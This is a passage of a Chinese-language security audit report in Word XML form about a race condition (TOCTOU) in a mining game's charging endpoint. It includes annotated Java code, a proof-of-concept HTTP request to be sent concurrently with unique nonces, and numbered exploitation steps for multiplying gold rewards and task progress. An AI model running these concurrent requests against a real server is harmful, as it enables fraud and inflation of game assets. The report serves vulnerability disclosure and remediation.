          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT … FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两个操作之间存在时序窗口：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="771"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发的 N 条请求可在任意一条事务提交之前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">完成对矿机状态的读取，均读到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（或 null），均通过重复充电的卫语句检查；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="772"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">随后各事务在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 层面被序列化——只要用户电力余额 ≥ N，N 条事务全部会依次通过余额校验并各自扣减 1 电力；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="773"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">每条成功的事务都会执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>saveChargeRecord(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，向 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>power_charge_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表写入一条含 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>bonusGold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的充电奖励记录，并调用一次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress(userId, "7", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 推进任务进度；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">矿机的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>chargedExpireTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段以「最后一次写入」为准，功能上只有一次充电效果，但对应产生了 N 条奖励记录、扣除了 N 点电力、触发了 N 次任务进度更新。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">如果后端对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PowerChargeRecord.bonusGold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的后续处理（实际金币结算、季节积分等）是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>按记录条数累加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，攻击者即可用 N 倍电力换取 N 倍金币奖励，形成游戏资产通胀。即便后端仅对记录做统计展示，任务系统也会被重复推进，破坏任务完成逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="775"/>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POST /api/power/charge (TokenAuthFilter 验 Token → SignAuthTestFilter 验签)</w:t>
              <w:br/>
              <w:t xml:space="preserve">       ↓ userId 来自 Token（安全）  slotId 来自 @RequestBody（可控）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  PowerController.charge()</w:t>
              <w:br/>
              <w:t xml:space="preserve">       ↓</w:t>
              <w:br/>
              <w:t xml:space="preserve">  PowerService.charge(userId, slotId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">       ├─ [READ  无锁] userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0)</w:t>
              <w:br/>
              <w:t xml:space="preserve">       ├─ [CHECK 无锁] miner.getIsCharged() / miner.getChargedExpireTime()   ← TOCTOU 窗口开始</w:t>
              <w:br/>
              <w:t xml:space="preserve">       ├─ [LOCK  FOR UPDATE] userPowerRepository.findByUserIdForUpdate(userId) ← 序列化点</w:t>
              <w:br/>
              <w:t xml:space="preserve">       ├─ power.setPowerBalance(power.getPowerBalance() - POWER_COST)</w:t>
              <w:br/>
              <w:t xml:space="preserve">       ├─ miner.setIsCharged(1) / miner.setChargedExpireTime(...)</w:t>
              <w:br/>
              <w:t xml:space="preserve">       ├─ saveChargeRecord(...)  ← 每次成功事务各写一条奖励记录</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">       └─ taskExecutionService.updateProgress(userId, "7", 1) ← 每次成功各触发一次</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="776"/>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：若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>bonusGold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录被用于实际金币/积分结算，攻击者可线性放大奖励收益（拥有 N 电力 → 产生 N 条奖励记录 → 获得 N 倍 bonusGold）；任务系统将被多次推进，可能触发任务重复完成奖励。</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入口：PowerController.java</w:t>
              <w:br/>
              <w:t>// ChargeForm 字段：</w:t>
              <w:br/>
              <w:t>//   Integer slotId;  ← 攻击者完全可控（HTTP 请求体 JSON）</w:t>
              <w:br/>
              <w:t>@PostMapping("/charge")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; charge(@CurrentUserId Long userId,  // ← userId 来自 Token，安全</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                 @RequestBody ChargeForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    powerService.charge(userId, form.getSlotId()); // ← slotId 污点传入 service 层</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 业务核心：PowerService.java</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void charge(Long userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("坑位无矿机"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 普通 SELECT，不加 FOR UPDATE，并发事务均能读到相同快照</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime now = LocalDateTime.now();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (miner.getIsCharged() != null &amp;&amp; miner.getIsCharged() == 1</w:t>
              <w:br/>
              <w:t xml:space="preserve">            &amp;&amp; miner.getChargedExpireTime() != null &amp;&amp; miner.getChargedExpireTime().isAfter(now)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("该矿机正在充电加速中，不可重复充电");</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // ↑ 卫语句基于无锁读取的快照判断——N 个并发事务同时读到 isCharged=0 时，</w:t>
              <w:br/>
              <w:t xml:space="preserve">        //   N 个事务全部通过此检查，TOCTOU 窗口在此打开 ← 漏洞点</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserPower power = userPowerRepository.findByUserIdForUpdate(userId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("用户电力记录不存在"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ FOR UPDATE 序列化点——N 个事务在此排队；</w:t>
              <w:br/>
              <w:t xml:space="preserve">    //   只要余额 &gt;= N*POWER_COST，N 个事务全部能通过余额检查并扣减电力</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    if (power.getPowerBalance() == null || power.getPowerBalance() &lt; POWER_COST) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("电力不足，暂无法为矿机充电");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    power.setPower</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Balance(power.getPowerBalance() - POWER_COST);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userPowerRepository.save(power);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    miner.setIsCharged(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setChargedExpireTime(LocalDateTime.now().plusMinutes(getDurationMinutes()));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner); // ← 最后提交的事务覆盖前一个，矿机仅一次充电效果</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    taskExecutionService.updateProgress(userId, "7", 1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ N 个并发成功事务各调用一次，任务进度被推进 N 次 ← 漏洞点</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    saveChargeRecord(userId, POWER_COST, 1, List.of(miner));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ N 个并发成功事务各写一条 PowerChargeRecord（含 bonusGold）← 漏洞点</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 奖励记录写入：PowerService.java saveChargeRecord</w:t>
              <w:br/>
              <w:t>private void saveChargeRecord(Long userId, int powerConsumed, int minerCount, List&lt;UserMiner&gt; miners) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    PowerChargeRecord r = new PowerChargeRecord();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setChargeAt(LocalDateTime.now());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setPowerConsumed(powerConsumed);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setMinerCount(minerCount);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setBonusGold(minerService.estimateChargeBonusGold(miners, getDurationMinutes(), getAccelerationRatio()));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 每条并发成功事务各自估算并存储一份 bonusGold，N 个事务 = N 份奖励记录 ← 漏洞点</w:t>
              <w:br/>
              <w:t xml:space="preserve">    powerChargeRecordRepository.save(r);</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步骤一：正常登录获取 Bearer Token（略）</w:t>
              <w:br/>
              <w:br/>
              <w:t># 步骤二：并发发送 N=5 条充电请求（需当前电力余额 &gt;= 5）</w:t>
              <w:br/>
              <w:t># 使用 GNU parallel / Python asyncio / curl --parallel 等工具同时发送</w:t>
              <w:br/>
              <w:br/>
              <w:t>POST /api/power/charge HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;有效Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;唯一nonce&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;对应签名&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{"slotId": &lt;攻击者持有矿机的slotId&gt;}</w:t>
              <w:br/>
              <w:br/>
              <w:t># 上述请求同时发送 5 份（每份使用不同 nonce 和对应签名）</w:t>
              <w:br/>
              <w:t># 预期结果：5 条请求均返回 HTTP 200 / {"code":200}</w:t>
              <w:br/>
              <w:t>#           power_charge_record 表中产生 5 条记录</w:t>
              <w:br/>
              <w:t>#           power_balance 减少 5</w:t>
              <w:br/>
              <w:t>#           矿机仅有一次充电效果（isCharged=1，expiry=最后一次事务的时间）</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>#           task "7" 进度推进 5 次</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="777"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者账号准备充足电力（≥ N，如 N=5 则准备 5 点电力）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="778"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">选择一个未充电的矿机槽位，记录其 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="779"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">在获得有效 Token 和签名参数后，使用脚本在同一时刻并发提交 N 条相同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的充电请求（每条使用独立 nonce 以通过防重放检查）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="780"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">观察 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>power_charge_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表：存在 N 条记录，每条均含独立的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>bonusGold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 估算值；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="781"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等待后端定时结算 / 金币发放任务运行——若按记录条数累计发放，则获得 N 倍奖励；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="782"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>检查任务系统：「充电完成」任务进度已被推进 N 次。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="78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784"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通用户（需通过 TokenAuthFilter 身份认证 + SignAuthTestFilter 签名验证）；无需任何管理员权限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785"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PowerController.java.charge → PowerService.java.charge → PowerService.java.getDurationMinutes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audit_m165_598_charge_ctrl-path4of6.md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：PowerService.java#charge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_36" w:id="36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞35：矿机充电竞态条件（TOCTOU）导致任务进度双重触发与充电记录重复写入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="78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：charge 方法矿机已充电状态检查与电力扣减非原子操作（TOCTOU 竞态）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="78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src/main/java/com/gameBack/mjservice/service/PowerService.java:charge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="78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：并发安全 / 业务逻辑（TOCTOU 竞态条件）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="78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79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：普通已登录用户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charge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法内部存在典型的 TOCTOU（Time-Of-Check Time-Of-Use）竞态条件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="791"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
